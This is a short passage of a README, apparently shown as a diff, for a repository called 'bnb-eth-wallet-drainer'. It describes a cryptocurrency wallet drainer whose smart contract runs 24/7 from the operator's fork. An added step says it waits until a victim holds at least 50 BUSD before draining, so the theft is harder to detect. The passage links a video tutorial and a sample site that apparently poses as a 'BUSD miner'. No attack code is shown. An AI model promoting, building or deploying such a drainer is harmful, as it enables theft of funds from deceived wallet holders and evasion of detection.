zeddstech/bnb-eth-wallet-drainer/README.md

 4. the smart contract runs from the script in your fork and is running 24/7 so you have full control

+5. If the victim has less than 50 busd in there wallet it will not drain it so its harder to detect it waits for the victim to get a certain amount of busd

 youtube tutorial https://www.youtube.com/watch?v=SnDlcDBAjso
 sample site https://busdminer.netlify.app/